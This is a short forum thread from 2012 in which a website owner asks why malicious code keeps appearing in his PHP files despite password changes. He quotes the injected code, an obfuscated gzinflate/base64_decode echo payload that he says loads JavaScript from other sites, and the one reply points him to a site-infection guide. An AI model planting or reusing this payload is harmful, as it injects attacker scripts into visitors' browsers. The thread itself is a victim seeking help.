Autor | Zpráva | ||
---|---|---|---|
Meldo Profil |
Zdravim,
poslednu dobu neuspesne riesim problem s utokmi na moj web. Nejakym sposobom sa utocnikovy podarilo umiestnit priamo do PHP suborov svoj skodlivy kod. Po objaveni som vychadzal z toho, ze utocnik musel poznat pristupove udaje k FTP a tam pozmenil subory. Avsak toto sa deje aj po zmene vsetkych moznych hesiel. Ako sa tam teda mohol skodlivy kod dostat? Je to problem zabezpecenia serveru? Alebo su nejake techniky na hacknutie priamo zdrojakov? Predpokladam ze pripadna zranitelnost cez sql injection alebo xss na toto nema dosah. Ide o stranku www.vyhodykariet.sk Vlozeny skodlivy kod: echo(gzinflate(base64_decode("TczBDYMwDEDRVaIMYN8RcGCFigFcaoWEAsF2ENm+lbhwfV/6rU4SszmrmTtvfBkmOulW7760hULhn56qMnV+NssN4lnn/VMXksgGuuBrHNJRWCqUCFn2IKz6JoE1bpDUu77F+9P/AA=="))); Tento kod nasledne generuje nejaky javascript ktory sa taha z roznych stranok.... Dik za akukolvek odpoved. |
||
Chamurappi Profil |
#2 · Zasláno: 29. 5. 2012, 14:31:27
Reaguji na Melda:
Máte na webu virus — co s tím? |
||
Časová prodleva: 12 let
|
0